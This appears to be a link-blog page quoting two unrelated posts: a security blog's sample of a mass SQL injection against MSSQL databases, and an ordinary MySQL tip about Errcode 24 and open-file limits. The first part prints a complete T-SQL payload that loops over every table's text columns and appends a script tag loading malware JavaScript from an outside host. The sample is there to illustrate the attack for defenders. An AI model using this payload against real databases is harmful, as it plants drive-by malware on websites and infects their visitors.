TrustedSource – Blog – New SQL Injection Attack Infecting Machines

Here’s a sample of the type of SQL Injection MSSQL (and possibly Sybase) databases may be subjected to:

DECLARE @T varchar(255), @C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name, b.name from sysobjects a, syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec(’update [‘+@T+’] set [‘+@C +’]=[‘+@C+’]+””></title><script src=”http://www.domain.com/malware/ w.js”></script><!–” where ‘+@C+’ not like ”%”></title><script src=”http://www.domain.com/malware/w.js “></script><!–”’)FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

 TrustedSource – Blog – New SQL Injection Attack Infecting Machines

Racker Hacker » MySQL: Errcode: 24 when using LOCK TABLES

Racker Hacker » MySQL: Errcode: 24 when using LOCK TABLES

There’s two ways to fix the problem. First, if you find that you only hit the limit during mysqldumps and never during normal database operation, just add --single-transaction to your mysqldump command line options. This will cause mysql to keep only one table open at a time.

However, if this happens while backups aren’t running, you may want to increase the open_files_limit in your MySQL configuration file. By default, the variable is set to 1,024 open files.

For further reading:
5.2.3. System Variables
7.13. mysqldump – A Database Backup Program